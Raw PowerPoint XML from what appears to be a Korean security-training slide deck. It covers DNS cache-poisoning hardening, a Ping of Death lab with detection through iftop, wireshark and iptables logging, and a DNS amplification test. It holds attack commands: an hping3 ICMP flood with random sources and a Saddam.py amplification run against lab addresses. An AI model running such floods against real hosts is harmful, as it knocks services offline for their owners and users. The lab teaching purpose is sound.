                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3403098023"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1775968">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3514532794"/>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변경 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변경 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비고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1183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query-source port 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라인 삭제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1054174"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="23469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use-id-pool false;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use-id-pool true;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false → true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078306"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2C5D17E-4C78-4D00-B07E-529D5D47B33F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375608" y="3862916"/>
            <a:ext cx="1782826" cy="284226"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C9A3D7B-A7D5-484E-8CA8-FD5787240D88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6440922" y="4741753"/>
            <a:ext cx="1516507" cy="305689"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="17907" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:miter/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4A0B6A-B8C6-4BA4-AA37-F16B407F0089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2365999737"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6210742" y="5127703"/>
          <a:ext cx="5328158" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5328158">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3378860283"/>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9152761"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="172720" marR="0" indent="-17272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랜덤 값이 사용되더라도 공격을 반복적으로 수행함으로써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 오염을 성공시킬 수도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100375"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D5CEE9-902B-4C5B-83D1-A4BA74074FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="6028002"/>
            <a:ext cx="5616792" cy="460175"/>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b="1" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325303933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33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A8E4306-90D9-4823-A00F-E0C0BBF1BB63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="815521" y="989087"/>
            <a:ext cx="1782826" cy="28422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404509093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Request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대용량의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단위로 분할시켜 송신하고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대상이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수신하고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재조합 할 때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CPU</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과부하 현상이 나타나게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1982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25253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hping3 --icmp --rand-source 10.10.1.101 -d 65000 --flood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2" y="1810512"/>
            <a:ext cx="5616792" cy="4675628"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="7030A0"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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47861960">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE5B1772-AE20-40D4-AB99-B8FEFF46C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7616"/>
            <a:ext cx="5400675" cy="51276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47861800">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68957771-1FAD-43FE-890B-8B609D17D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32" y="2414016"/>
            <a:ext cx="4008438"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88961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6"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69" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D1841E6-EA38-474D-9DB2-C49CFA51FD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90016"/>
            <a:ext cx="5400675" cy="144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2151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Ping of Death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iftop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확인 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차단하고 로그 기록을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남기시오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1468F5E4-2EBF-4951-ADA0-008B174065B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46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[setup]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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>탐지 항목</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격서버에서 희생자서버로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ping of Death </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격시도</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>명령으로 트래픽 양 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>희생자서버에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 분석해보면 패킷이 너무 커서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>여러개로</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 분할된 것 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>- ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>헤더 분석 후 페이로드 크기 값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iftop</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dirty="0" err="1"/>
              <a:t>iftop</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TX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전송 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ RX : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수신 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ TOTAL : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>전체 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>cumm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>iftop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 후 현재까지의 총 데이터 양 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ peak : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>피크시의 데이터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/ rates : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>각각 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>초의 평균흐름 </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47860040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A40277F5-C572-4F58-BE6E-FEC242BB5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1520"/>
            <a:ext cx="5400675" cy="1444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822884C2-FCB7-47B3-9010-2F92A756233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pic>
        <p:nvPicPr>
          <p:cNvPr id="8195" name="_x247862040">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3A32AC6-4452-49F0-9A6E-7C4AA6CC7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1036" y="896112"/>
            <a:ext cx="20034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47863320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14467215-CB03-4782-97E3-9A1EB557CD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1207008"/>
            <a:ext cx="5400675" cy="305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06333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en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷이 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ipv4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷으로 쪼개져 들어오는 것을 확인 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Reassembled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>data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rsyslog</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4) /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables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217" name="_x247861160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4A30B93-8357-4639-9D22-964A379AD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832" y="926592"/>
            <a:ext cx="5400675" cy="3438525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9219" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FAF6D21-0ED9-4F74-B7FB-B448FE8BAB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68" y="5202426"/>
            <a:ext cx="5295900" cy="449263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9221" name="_x247863080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6642B922-BA29-46C1-B6B0-D6A5B52AA2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926592"/>
            <a:ext cx="5400675" cy="3646488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9223" name="_x247862600">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DC26899-603C-4414-A161-2D1F5F8255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7674" y="5180201"/>
            <a:ext cx="5326063" cy="35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4055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3690938"/>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6) tail -f /var/log/message </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>DROP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>되는 로그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1" y="4248284"/>
            <a:ext cx="5616792" cy="2209606"/>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247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DABD08CA-E4CF-4213-AC0C-80AE18A3D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081338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10243" name="_x247862680">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99397CCC-E732-4B75-AAAA-C1D6A16E4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90" y="4645152"/>
            <a:ext cx="3260725" cy="39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79985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공격이 가능한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example.com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9217661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대상 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># dig @10.10.1.101 example.com</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>※ dig : DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서버에 질의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>응답에 활용하는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Command-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>툴로서 도메인 분석 등에 활용 되고 있다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증폭 지수 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># python /root/Saddam.py benchmark –d </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>dns.txt:example.com</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171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>11</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>배 증폭 가능함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>공격 효과 확인을 위해 공격 대상 호스트</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(10.10.1.1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
